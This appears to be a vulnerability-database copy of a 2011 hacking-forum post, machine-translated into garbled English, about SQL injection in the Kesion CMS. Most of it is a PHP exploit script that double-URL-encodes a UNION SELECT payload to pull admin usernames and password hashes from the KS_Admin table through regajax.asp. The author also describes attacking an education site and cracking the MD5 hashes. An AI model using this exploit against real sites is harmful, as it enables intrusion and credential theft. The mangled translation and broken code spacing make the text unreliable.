Tech-ex kesion 6. x - 7.06 continue to use-vulnerability warning-the black bar safety net

2011-10-22T00:00:00

Description

Today with a black wide engage in a edu, it is a sad reminder of the webmaster, some time ago was installed the tech-ex 6. 5, and now directly get your ass kicked. that... t00ls a large cattle provides the use of the method, I burst the md5, but understand not out···the mssql version of section communications, Good luck can back up shell what, can not give up the bird. So, online article analysis of the text, write a piece of php that Local build php+apache, the direct loss tools can be run. <? php /* $str = "' union Select top 1 0 AdminID,UserName&chr(1 2 4)&PassWord From KS_Admin"; for ($i=0; $i<=strlen($str); $i++){ $temp .= "%2 5". base_convert(ord($str[$i]),1 0,1 6); } echo $temp." 0"; // http://www.xxxx.com /user/reg/regajax. asp? action=getcityoption&province=%2 5 6 6% 2 5 2 7% 2 5 2 0%256F%2 5 7 2% 2 5 2 0% 2 5 3 1%253D%2 5 3 1% 2 5 0 0 6 // All the information $id = $_GET['id']; $url = "http://www.xxxx.com /user/reg/regajax. asp? action=getcityoption&province="; $param = "f'Or 1=1 and 1=".$ id; // ? id=1 for ($i = 0; $i < strlen($param); $i ++) { $temp .= "%2 5". base_convert(ord($param[$i]),1 0,1 6); } $url = $url.$ temp."% 2 5 0 0"; //echo $url; //echo file_get_contents($url); echo GetSources($url); function GetSources($Url,$User_Agent=",$Referer_Url=") //fetch a specified page { //$Url needs to crawl the page address //$User_Agent need to return the user_agent information such as“baiduspider”or“googlebot” $ch = curl_init(); curl_setopt ($ch, CURLOPT_URL, $Url); curl_setopt ($ch, CURLOPT_USERAGENT, $User_Agent); curl_setopt ($ch, CURLOPT_REFERER, $Referer_Url); curl_setopt($ch, CURLOPT_FOLLOWLOCATION,1); curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1); $MySources = curl_exec ($ch); curl_close($ch); return $MySources; } - ?& gt; Your own look at To modify. Here there is a problem, php file_get_contents can't get the 5 0 5 The error specific information It is not an error of the injection, only the blind

{"type": "myhack58", "references": [], "href": "http://www.myhack58.com/Article/html/3/62/2011/32110.htm", "bulletinFamily": "info", "cvelist": [], "cvss": {"vector": "NONE", "score": 0.0}, "enchantments": {"score": {"value": 0.1, "vector": "NONE"}, "dependencies": {}, "backreferences": {}, "exploitation": null, "vulnersScore": 0.1}, "lastseen": "2016-10-29T17:54:17", "viewCount": 3, "id": "MYHACK58:62201132110", "published": "2011-10-22T00:00:00", "edition": 1, "reporter": "\u4f5a\u540d", "modified": "2011-10-22T00:00:00", "title": "Tech-ex kesion 6. x - 7.06 continue to use-vulnerability warning-the black bar safety net", "description": "Today with a black wide engage in a edu, it is a sad reminder of the webmaster, some time ago was installed the tech-ex 6. 5, and now directly get your ass kicked. that...\n\nt00ls a large cattle provides the use of the method, I burst the md5, but understand not out\u00b7\u00b7\u00b7the mssql version of section communications,\n\nGood luck can back up shell what, can not give up the bird. So, online article analysis of the text, write a piece of php that\n\nLocal build php+apache, the direct loss tools can be run.\n\n<? php\n\n/*\n\n$str = \"' union Select top 1 0 AdminID,UserName&chr(1 2 4)&PassWord From KS_Admin\";\n\nfor ($i=0; $i<=strlen($str); $i++){\n\n$temp .= \"%2 5\". base_convert(ord($str[$i]),1 0,1 6);\n\n}\n\necho $temp.\" 0\";\n\n// http://www.xxxx.com /user/reg/regajax. asp? action=getcityoption&province=%2 5 6 6% 2 5 2 7% 2 5 2 0%256F%2 5 7 2% 2 5 2 0% 2 5 3 1%253D%2 5 3 1% 2 5 0 0 6\n\n// All the information\n\n$id = $_GET['id'];\n\n$url = \"http://www.xxxx.com /user/reg/regajax. asp? action=getcityoption&province=\";\n\n$param = \"f'Or 1=1 and 1=\".$ id; // ? id=1\n\nfor ($i = 0; $i < strlen($param); $i ++)\n\n{\n\n$temp .= \"%2 5\". base_convert(ord($param[$i]),1 0,1 6);\n\n}\n\n$url = $url.$ temp.\"% 2 5 0 0\";\n\n//echo $url;\n\n//echo file_get_contents($url);\n\necho GetSources($url);\n\nfunction GetSources($Url,$User_Agent=\",$Referer_Url=\") //fetch a specified page\n\n{\n\n//$Url needs to crawl the page address\n\n//$User_Agent need to return the user_agent information such as\u201cbaiduspider\u201dor\u201cgooglebot\u201d\n\n$ch = curl_init();\n\ncurl_setopt ($ch, CURLOPT_URL, $Url);\n\ncurl_setopt ($ch, CURLOPT_USERAGENT, $User_Agent);\n\ncurl_setopt ($ch, CURLOPT_REFERER, $Referer_Url);\n\ncurl_setopt($ch, CURLOPT_FOLLOWLOCATION,1);\n\ncurl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);\n\n$MySources = curl_exec ($ch);\n\ncurl_close($ch);\n\nreturn $MySources;\n\n} -\n\n?& gt;\n\nYour own look at To modify.\n\nHere there is a problem, php file_get_contents can't get the 5 0 5\n\nThe error specific information\n\nIt is not an error of the injection, only the blind\n", "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1647718925}}